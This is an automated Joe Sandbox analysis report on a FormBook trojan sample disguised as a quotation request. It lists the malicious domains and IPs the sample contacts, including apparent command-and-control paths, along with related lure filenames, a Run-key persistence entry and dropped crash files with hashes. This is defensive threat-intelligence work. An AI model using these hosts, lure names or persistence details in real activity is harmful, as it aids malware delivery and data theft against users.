                                                          http://www.cr-pos.comsBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000E.00000002.3795206841.0000000005411000.00000040.80000000.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.cssSecEdit.exe, 0000000C.00000002.3793502568.0000000003CD8000.00000004.10000000.00040000.00000000.sdmp, sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000E.00000002.3792978894.0000000003678000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=SecEdit.exe, 0000000C.00000002.3795946825.0000000007992000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown

                                                          World Map of Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public IPs

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          91.184.0.111
                                                          		vacaturecast.comNetherlands
                                                          		197902HOSTNETNLtrue
                                                          198.12.241.35
                                                          		aceautocorp.comUnited States
                                                          		26496AS-26496-GO-DADDY-COM-LLCUStrue
                                                          192.250.231.28
                                                          		cr-pos.comUnited States
                                                          		36454CNSV-LLCUStrue
                                                          217.70.184.50
                                                          		webredir.vip.gandi.netFrance
                                                          		29169GANDI-ASDomainnameregistrar-httpwwwgandinetFRtrue
                                                          193.108.130.23
                                                          		www.drivemktg.coRussian Federation
                                                          		49334SVK-ASCZtrue
                                                          47.239.13.172
                                                          		xiaoyue.zhuangkou.comUnited States
                                                          		20115CHARTER-20115UStrue
                                                          91.195.240.19
                                                          		parkingpage.namecheap.comGermany
                                                          		47846SEDO-ASDEtrue
                                                          199.192.19.19
                                                          		www.fardvuss.topUnited States
                                                          		22612NAMECHEAP-NETUStrue
                                                          154.213.157.32
                                                          		www.54bxd.cyouSeychelles
                                                          		132839POWERLINE-AS-APPOWERLINEDATACENTERHKtrue
                                                          31.186.11.254
                                                          		grafiktema.xyzTurkey
                                                          		199484BETAINTERNATIONALTRtrue

                                                          General Information

                                                          Joe Sandbox version:40.0.0 Tourmaline
                                                          Analysis ID:1509644
                                                          Start date and time:2024-09-11 22:01:10 +02:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 11m 4s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Number of analysed new started processes analysed:22
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:2
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe
                                                          Detection:MAL
                                                          Classification:mal100.troj.spyw.expl.evad.winEXE@17/11@17/10
                                                          EGA Information:
                                                          • Successful, ratio: 75%
                                                          HCA Information:
                                                          • Successful, ratio: 84%
                                                          • Number of executed functions: 73
                                                          • Number of non-executed functions: 249
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe
                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                          Warnings

                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                          • Excluded IPs from analysis (whitelisted): 20.189.173.20
                                                          • Excluded domains from analysis (whitelisted): login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • Report size getting too big, too many NtSetInformationFile calls found.
                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                          • VT rate limit hit for: z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe

                                                          Simulations

                                                          Behavior and APIs

                                                          TimeTypeDescription
                                                          16:02:16API Interceptor21x Sleep call for process: powershell.exe modified
                                                          16:02:22API Interceptor1x Sleep call for process: WerFault.exe modified
                                                          16:03:06API Interceptor11439378x Sleep call for process: SecEdit.exe modified
                                                          22:02:34AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 26RXLR- C:\Program Files (x86)\Windows Mail\wab.exe
                                                          22:02:42AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 26RXLR- C:\Program Files (x86)\Windows Mail\wab.exe

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          91.184.0.111z1PEDIDODECOMPRAURGENTE.exeGet hashmaliciousFormBookBrowse
                                                          • www.vacaturecast.com/sid8/
                                                          z2AMOSTRAS.exeGet hashmaliciousFormBookBrowse
                                                          • www.vacaturecast.com/sid8/
                                                          #U0417#U0410#U041f#U0420#U041e#U0421.exeGet hashmaliciousFormBookBrowse
                                                          • www.vacaturecast.com/sid8/
                                                          #U0417#U0410#U041f#U0420#U041e#U0421.exeGet hashmaliciousFormBookBrowse
                                                          • www.vacaturecast.com/sid8/
                                                          #U041e#U041f#U0418#U0421#U0410#U041d#U0418#U0415.exeGet hashmaliciousFormBookBrowse
                                                          • www.vacaturecast.com/sid8/
                                                          #U0417#U0410#U041a#U0410#U0417 #U041d#U0410 #U041f#U041e#U041a#U0423#U041f#U041a#U0423.exeGet hashmaliciousFormBookBrowse
                                                          • www.vacaturecast.com/sid8/
                                                          #U0633#U0641#U0627#U0631#U0634 #U062e#U0631#U06cc#U062f #U062c#U062f#U06cc#U062f.exeGet hashmaliciousFormBookBrowse
                                                          • www.vacaturecast.com/sid8/
                                                          #U0633#U0641#U0627#U0631#U0634 #U062e#U0631#U06cc#U062f #U062c#U062f#U06cc#U062f.exeGet hashmaliciousFormBookBrowse
                                                          • www.vacaturecast.com/sid8/
                                                          #U0646#U0645#U0648#U0646#U0647 #U0647#U0627.exeGet hashmaliciousFormBookBrowse
                                                          • www.vacaturecast.com/sid8/
                                                          LisectAVT_2403002B_309.exeGet hashmaliciousBdaejec, FormBookBrowse
                                                          • www.vacaturecast.com/34ev/
                                                          198.12.241.35rfOfF6s6gI.exeGet hashmaliciousFormBookBrowse
                                                          • www.aceautocorp.com/nyuo/
                                                          4qV0xW2NSj.exeGet hashmaliciousFormBookBrowse
                                                          • www.aceautocorp.com/nyuo/
                                                          DHL_AWB#6078538091.exeGet hashmaliciousFormBookBrowse
                                                          • www.aceautocorp.com/nyuo/
                                                          DHL_AWB#6078538091.exeGet hashmaliciousFormBookBrowse
                                                          • www.aceautocorp.com/nyuo/
                                                          z1PEDIDODECOMPRAURGENTE.exeGet hashmaliciousFormBookBrowse
                                                          • www.aceautocorp.com/9og3/
                                                          z2AMOSTRAS.exeGet hashmaliciousFormBookBrowse
                                                          • www.aceautocorp.com/9og3/
                                                          #U0417#U0410#U041f#U0420#U041e#U0421.exeGet hashmaliciousFormBookBrowse
                                                          • www.aceautocorp.com/9og3/
                                                          #U0417#U0410#U041f#U0420#U041e#U0421.exeGet hashmaliciousFormBookBrowse
                                                          • www.aceautocorp.com/9og3/
                                                          #U041e#U041f#U0418#U0421#U0410#U041d#U0418#U0415.exeGet hashmaliciousFormBookBrowse
                                                          • www.aceautocorp.com/9og3/
                                                          #U0417#U0410#U041a#U0410#U0417 #U041d#U0410 #U041f#U041e#U041a#U0423#U041f#U041a#U0423.exeGet hashmaliciousFormBookBrowse
                                                          • www.aceautocorp.com/9og3/
                                                          192.250.231.28z1PEDIDODECOMPRAURGENTE.exeGet hashmaliciousFormBookBrowse
                                                          • www.cr-pos.com/o1v8/
                                                          #U0417#U0410#U041f#U0420#U041e#U0421.exeGet hashmaliciousFormBookBrowse
                                                          • www.cr-pos.com/o1v8/
                                                          #U0417#U0410#U041a#U0410#U0417 #U041d#U0410 #U041f#U041e#U041a#U0423#U041f#U041a#U0423.exeGet hashmaliciousFormBookBrowse
                                                          • www.cr-pos.com/o1v8/
                                                          #U0633#U0641#U0627#U0631#U0634 #U062e#U0631#U06cc#U062f #U062c#U062f#U06cc#U062f.exeGet hashmaliciousFormBookBrowse
                                                          • www.cr-pos.com/o1v8/
                                                          #U0646#U0645#U0648#U0646#U0647 #U0647#U0627.exeGet hashmaliciousFormBookBrowse
                                                          • www.cr-pos.com/o1v8/
                                                          LisectAVT_2403002B_412.exeGet hashmaliciousFormBookBrowse
                                                          • www.cr-pos.com/drbb/
                                                          COTIZACI#U00d3N.exeGet hashmaliciousFormBookBrowse
                                                          • www.cr-pos.com/o1v8/
                                                          z4AMOSTRA.exeGet hashmaliciousFormBookBrowse
                                                          • www.cr-pos.com/o1v8/
                                                          z3NOVOPEDIDODECOMPRA.exeGet hashmaliciousFormBookBrowse
                                                          • www.cr-pos.com/o1v8/
                                                          #U041f#U041e#U041a#U0423#U041f#U041a#U0410 #U0422#U041e#U0412#U0410#U0420#U041e#U0412.exeGet hashmaliciousFormBookBrowse
                                                          • www.cr-pos.com/o1v8/

                                                          Domains

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          webredir.vip.gandi.netOrder#Qxz091124.exeGet hashmaliciousFormBookBrowse
                                                          • 217.70.184.50
                                                          DOC092024-0431202229487.exeGet hashmaliciousFormBookBrowse
                                                          • 217.70.184.50
                                                          PO #86637.exeGet hashmaliciousFormBookBrowse
                                                          • 217.70.184.50
                                                          au1FjlRwFR.exeGet hashmaliciousFormBookBrowse
                                                          • 217.70.184.50
                                                          COTIZACION 290824.exeGet hashmaliciousFormBookBrowse
                                                          • 217.70.184.50
                                                          Scan_000019921929240724_PDA _ SOA_Payment Reference TR-37827392-2024-08-29.exeGet hashmaliciousFormBookBrowse
                                                          • 217.70.184.50
                                                          COMMERCAIL INVOICE AND AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                                                          • 217.70.184.50
                                                          DHL AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                                                          • 217.70.184.50
                                                          Pedido De Compra OC 4504 19082024 De Grupoeld SAS.exeGet hashmaliciousFormBookBrowse
                                                          • 217.70.184.50
                                                          Udspecialiser45.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                          • 217.70.184.50
                                                          www.54bxd.cyouz1PEDIDODECOMPRAURGENTE.exeGet hashmaliciousFormBookBrowse
                                                          • 154.213.157.32
                                                          z2AMOSTRAS.exeGet hashmaliciousFormBookBrowse
                                                          • 154.213.157.32
                                                          #U0417#U0410#U041f#U0420#U041e#U0421.exeGet hashmaliciousFormBookBrowse
                                                          • 154.213.157.32
                                                          #U0417#U0410#U041f#U0420#U041e#U0421.exeGet hashmaliciousFormBookBrowse
                                                          • 154.213.157.32
                                                          #U041e#U041f#U0418#U0421#U0410#U041d#U0418#U0415.exeGet hashmaliciousFormBookBrowse
                                                          • 154.213.157.32
                                                          #U0417#U0410#U041a#U0410#U0417 #U041d#U0410 #U041f#U041e#U041a#U0423#U041f#U041a#U0423.exeGet hashmaliciousFormBookBrowse
                                                          • 154.213.157.32
                                                          #U0633#U0641#U0627#U0631#U0634 #U062e#U0631#U06cc#U062f #U062c#U062f#U06cc#U062f.exeGet hashmaliciousFormBookBrowse
                                                          • 154.213.157.32
                                                          #U0633#U0641#U0627#U0631#U0634 #U062e#U0631#U06cc#U062f #U062c#U062f#U06cc#U062f.exeGet hashmaliciousFormBookBrowse
                                                          • 154.213.157.32
                                                          #U0646#U0645#U0648#U0646#U0647 #U0647#U0627.exeGet hashmaliciousFormBookBrowse
                                                          • 154.213.157.32
                                                          COTIZACI#U00d3N.exeGet hashmaliciousFormBookBrowse
                                                          • 154.213.157.32
                                                          www.fardvuss.topz1PEDIDODECOMPRAURGENTE.exeGet hashmaliciousFormBookBrowse
                                                          • 199.192.19.19
                                                          z2AMOSTRAS.exeGet hashmaliciousFormBookBrowse
                                                          • 199.192.19.19
                                                          #U0417#U0410#U041f#U0420#U041e#U0421.exeGet hashmaliciousFormBookBrowse
                                                          • 199.192.19.19
                                                          #U0417#U0410#U041f#U0420#U041e#U0421.exeGet hashmaliciousFormBookBrowse
                                                          • 199.192.19.19
                                                          #U041e#U041f#U0418#U0421#U0410#U041d#U0418#U0415.exeGet hashmaliciousFormBookBrowse
                                                          • 199.192.19.19
                                                          #U0417#U0410#U041a#U0410#U0417 #U041d#U0410 #U041f#U041e#U041a#U0423#U041f#U041a#U0423.exeGet hashmaliciousFormBookBrowse
                                                          • 199.192.19.19
                                                          #U0633#U0641#U0627#U0631#U0634 #U062e#U0631#U06cc#U062f #U062c#U062f#U06cc#U062f.exeGet hashmaliciousFormBookBrowse
                                                          • 199.192.19.19
                                                          #U0633#U0641#U0627#U0631#U0634 #U062e#U0631#U06cc#U062f #U062c#U062f#U06cc#U062f.exeGet hashmaliciousFormBookBrowse
                                                          • 199.192.19.19
                                                          #U0646#U0645#U0648#U0646#U0647 #U0647#U0627.exeGet hashmaliciousFormBookBrowse
                                                          • 199.192.19.19
                                                          COTIZACI#U00d3N.exeGet hashmaliciousFormBookBrowse
                                                          • 199.192.19.19

                                                          ASNs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          GANDI-ASDomainnameregistrar-httpwwwgandinetFROrder#Qxz091124.exeGet hashmaliciousFormBookBrowse
                                                          • 217.70.184.50
                                                          DOC092024-0431202229487.exeGet hashmaliciousFormBookBrowse
                                                          • 217.70.184.50
                                                          firmware.armv4l.elfGet hashmaliciousUnknownBrowse
                                                          • 217.70.184.38
                                                          PO #86637.exeGet hashmaliciousFormBookBrowse
                                                          • 217.70.184.50
                                                          au1FjlRwFR.exeGet hashmaliciousFormBookBrowse
                                                          • 217.70.184.50
                                                          COTIZACION 290824.exeGet hashmaliciousFormBookBrowse
                                                          • 217.70.184.50
                                                          Scan_000019921929240724_PDA _ SOA_Payment Reference TR-37827392-2024-08-29.exeGet hashmaliciousFormBookBrowse
                                                          • 217.70.184.50
                                                          COMMERCAIL INVOICE AND AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                                                          • 217.70.184.50
                                                          DHL AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                                                          • 217.70.184.50
                                                          Udspecialiser45.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                          • 217.70.184.50
                                                          CNSV-LLCUShttps://sgsconsulting.com/Get hashmaliciousUnknownBrowse
                                                          • 192.250.227.23
                                                          https://sgsconsulting.com/Get hashmaliciousUnknownBrowse
                                                          • 192.250.227.23
                                                          http://linkplea.se/doarGet hashmaliciousUnknownBrowse
                                                          • 192.250.229.80
                                                          rfq_commercial_order_GMlist_for_Drumedis_tender_august_quater_2024.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                          • 192.250.234.170
                                                          https://kanomama.com/KFKFLDRFKLEK?///RG9tYWluXFVzZXJuYW1lQGRvbWFpbi5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                          • 192.250.229.40
                                                          Novi upit #876567-AWB.exeGet hashmaliciousFormBookBrowse
                                                          • 192.250.227.27
                                                          z1PEDIDODECOMPRAURGENTE.exeGet hashmaliciousFormBookBrowse
                                                          • 192.250.231.28
                                                          #U0417#U0410#U041f#U0420#U041e#U0421.exeGet hashmaliciousFormBookBrowse
                                                          • 192.250.231.28
                                                          SNu4RXZpoS.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                          • 192.250.227.28
                                                          #U0417#U0410#U041a#U0410#U0417 #U041d#U0410 #U041f#U041e#U041a#U0423#U041f#U041a#U0423.exeGet hashmaliciousFormBookBrowse
                                                          • 192.250.231.28
                                                          HOSTNETNLfirmware.x86_64.elfGet hashmaliciousUnknownBrowse
                                                          • 91.184.0.99
                                                          PO #86637.exeGet hashmaliciousFormBookBrowse
                                                          • 91.184.0.200
                                                          DEBIT NOTE July 2024 PART 2.exeGet hashmaliciousFormBookBrowse
                                                          • 91.184.0.200
                                                          COTIZACION 290824.exeGet hashmaliciousFormBookBrowse
                                                          • 91.184.0.200
                                                          ORDER_pdf.exeGet hashmaliciousFormBookBrowse
                                                          • 91.184.0.200
                                                          GOVT __OF SHARJAH - UNIVERSITY OF SHARJAH - Project 0238.exeGet hashmaliciousFormBookBrowse
                                                          • 91.184.0.200
                                                          bintoday1.exeGet hashmaliciousFormBookBrowse
                                                          • 91.184.0.200
                                                          ORDER_38746_pdf.exeGet hashmaliciousFormBookBrowse
                                                          • 91.184.0.200
                                                          z1PEDIDODECOMPRAURGENTE.exeGet hashmaliciousFormBookBrowse
                                                          • 91.184.0.111
                                                          z2AMOSTRAS.exeGet hashmaliciousFormBookBrowse
                                                          • 91.184.0.111
                                                          SVK-ASCZz1PEDIDODECOMPRAURGENTE.exeGet hashmaliciousFormBookBrowse
                                                          • 193.108.130.23
                                                          z2AMOSTRAS.exeGet hashmaliciousFormBookBrowse
                                                          • 193.108.130.23
                                                          #U0417#U0410#U041f#U0420#U041e#U0421.exeGet hashmaliciousFormBookBrowse
                                                          • 193.108.130.23
                                                          #U0417#U0410#U041f#U0420#U041e#U0421.exeGet hashmaliciousFormBookBrowse
                                                          • 193.108.130.23
                                                          #U041e#U041f#U0418#U0421#U0410#U041d#U0418#U0415.exeGet hashmaliciousFormBookBrowse
                                                          • 193.108.130.23
                                                          #U0417#U0410#U041a#U0410#U0417 #U041d#U0410 #U041f#U041e#U041a#U0423#U041f#U041a#U0423.exeGet hashmaliciousFormBookBrowse
                                                          • 193.108.130.23
                                                          #U0633#U0641#U0627#U0631#U0634 #U062e#U0631#U06cc#U062f #U062c#U062f#U06cc#U062f.exeGet hashmaliciousFormBookBrowse
                                                          • 193.108.130.23
                                                          #U0633#U0641#U0627#U0631#U0634 #U062e#U0631#U06cc#U062f #U062c#U062f#U06cc#U062f.exeGet hashmaliciousFormBookBrowse
                                                          • 193.108.130.23
                                                          #U0646#U0645#U0648#U0646#U0647 #U0647#U0627.exeGet hashmaliciousFormBookBrowse
                                                          • 193.108.130.23
                                                          COTIZACI#U00d3N.exeGet hashmaliciousFormBookBrowse
                                                          • 193.108.130.23
                                                          AS-26496-GO-DADDY-COM-LLCUShttps://arcg.is/1PqXT10Get hashmaliciousUnknownBrowse
                                                          • 132.148.76.244
                                                          https://arcg.is/1PqXT10Get hashmaliciousUnknownBrowse
                                                          • 132.148.76.244
                                                          https://canadaca1.godaddysites.comGet hashmaliciousUnknownBrowse
                                                          • 45.40.130.49
                                                          https://canadaca1.godaddysites.com/Get hashmaliciousUnknownBrowse
                                                          • 45.40.130.49
                                                          Quotation.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 148.66.136.151
                                                          https://storage.googleapis.com/sd___mailweb/OPPDHETGFTEGDHFHY____PEYDHEYS.htmlGet hashmaliciousPhisherBrowse
                                                          • 107.180.46.160
                                                          rfOfF6s6gI.exeGet hashmaliciousFormBookBrowse
                                                          • 198.12.241.35
                                                          4qV0xW2NSj.exeGet hashmaliciousFormBookBrowse
                                                          • 198.12.241.35
                                                          firmware.armv4l.elfGet hashmaliciousUnknownBrowse
                                                          • 68.178.246.77
                                                          firmware.i686.elfGet hashmaliciousUnknownBrowse
                                                          • 23.229.187.40

                                                          JA3 Fingerprints

                                                          No context

                                                          Dropped Files

                                                          No context

                                                          Created / dropped Files

                                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_z27PEDIDOSDECOTI_954f48805e9076ce729429ecc0754a401ce6_7d214189_669e09b5-aaaf-4e21-86d5-e50341c9a4d2\Report.wer

                                                          Download File
                                                          Process:C:\Windows\System32\WerFault.exe
                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):1.2477703124252326
                                                          Encrypted:false
                                                          SSDEEP:192:CKDsA5nLHIMdX0oBY6laWBeDlTwT1O65dzuiFYZ24lO8naI:QEncMdkoBYcamO411DzuiFYY4lO8n
                                                          MD5:B429B845BC99D285894A923E8B68E567
                                                          SHA1:9B9413326C822DEDF22E44B644C26D7A4B14BE56
                                                          SHA-256:BEF8BF5DF9613FC5B5D21B99B46E8F97A5A657123D7EE3BD50788940231D4827
                                                          SHA-512:9FA1FC0DC6CB1C3843F28472719A1103186C8776F3DC28002E8FE17F1C9AF03BBB34ED033B7DE94FAD413EAD99E06FBDCABADEB23D77046C44FD68B7BC143420
                                                          Malicious:false
                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.0.5.5.8.5.3.5.5.2.9.8.1.0.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.0.5.5.8.5.3.6.8.1.1.0.6.1.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.6.9.e.0.9.b.5.-.a.a.a.f.-.4.e.2.1.-.8.6.d.5.-.e.5.0.3.4.1.c.9.a.4.d.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.d.7.7.d.1.0.3.-.1.7.c.c.-.4.8.f.c.-.a.2.4.2.-.c.5.f.a.4.1.b.d.6.3.4.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.z.2.7.P.E.D.I.D.O.S.D.E.C.O.T.I.Z.A.C.I._._.N._._._.s._._.x._._.l._._.x._._._...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.A.r.k.h.a.n.g.e.l.s.k...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.1.8.-.0.0.0.1.-.0.0.1.3.-.3.9.9.0.-.3.9.7.c.8.5.0.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.9.4.0.7.6.d.6.b.4.c.b.d.7.2.b.2.d.4.6.a.5.9.9.f.3.7.0.2.2.5.6.0.0.0.0.0.0.0.0.!.0.0.0.0.e.8.3.e.0.1.d.c.a.3.b.3.6.8.4.e.4.f.4.

                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER6339.tmp.dmp

                                                          Download File
                                                          Process:C:\Windows\System32\WerFault.exe
                                                          File Type:Mini DuMP crash report, 16 streams, Wed Sep 11 20:02:16 2024, 0x1205a4 type
                                                          Category:dropped
                                                          Size (bytes):510731
                                                          Entropy (8bit):3.398464216671898
                                                          Encrypted:false
                                                          SSDEEP:3072:929AmUZLC3WFNb21CCqgR1S0r40A/iT3+v4Cbe7lilS47P6nu6cSDCP7Y:91E3cIqqTU/y3QsOynHD
                                                          MD5:4A70C262220EBD2384411B25D9383AA8
                                                          SHA1:9C1A3A85DADCA68A8213F083674AAC0AAC9D202C
                                                          SHA-256:94DEFADC856768B832EDF8075EFA3BB1F0A49D269C15A4950F245CF039273508
                                                          SHA-512:95F44D8BF3A5C17D7613F8CF7DB4897B34E479C26C64BA455E5B3AAB6F0876381EDE5A4681E7518D9A6F1E6A706267972A5B2A232DF51F6FDD94F040096FB32D
                                                          Malicious:false
                                                          Preview:MDMP..a..... .......H..f............t.......................$... '......d!..D'......DY.............l.......8...........T............:..c............H...........J..............................................................................eJ......,K......Lw......................T...........A..f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER6657.tmp.WERInternalMetadata.xml

                                                          Download File
                                                          Process:C:\Windows\System32\WerFault.exe
                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):8966
                                                          Entropy (8bit):3.7266999191483072
                                                          Encrypted:false
                                                          SSDEEP:192:R6l7wVeJ5vZzf6YWtqZ1gmfrLXOprx89b4OTfQzom:R6lXJBZL6YcK1gmfrL14afE
                                                          MD5:8171A34C1FF3050F865A075C7AF65811
                                                          SHA1:36E0D1BF6FEAB8B251243C282CE3014F410781C5
                                                          SHA-256:028F064C9F0A01F0D603DEA5B5038D1B211BC5D6542ACCE93553E6F4A2322F35
                                                          SHA-512:A607EED55900D42618B72BB0275528B1167834E216C35E0B832368505A265560B1751D3C086859ECF4676695EDFEFB65FCE4531ED338B7330240ED77A2CFEDD2
                                                          Malicious:false
                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.4.4.8.<./.P.i.

                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER6696.tmp.xml

                                                          Download File
                                                          Process:C:\Windows\System32\WerFault.exe
                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):4910
                                                          Entropy (8bit):4.63309527819161
                                                          Encrypted:false
                                                          SSDEEP:48:cvIwWl8zsFJg771I9q9WpW8VYy0Ym8M4JoDSDmFFmSyq850DvwYUuITmD5+D5Cd:uIjffI7NM7VFJo2pSxnUsV+VCd
                                                          MD5:34F1669DF737A028B577705366526888
                                                          SHA1:4F3E826DBE89DA12BB1EFE8733707ECF71DB2A27
                                                          SHA-256:8A054890234AB329C1E93DFE6AA3A1CD2B8C994EBD1E5713C5B300E510942DF6
                                                          SHA-512:C81EBA780E688B2F8A72CAFC5A19907B4833F04CC3E9CE0D8D6563A98DBEA7408CFEAB9893F8421FFE1FEC300866504872600776BDB1256AEB3BE8361518901A
                                                          Malicious:false
                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="496024" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):64
                                                          Entropy (8bit):1.1940658735648508
                                                          Encrypted:false
                                                          SSDEEP:3:Nlllultnxj:NllU
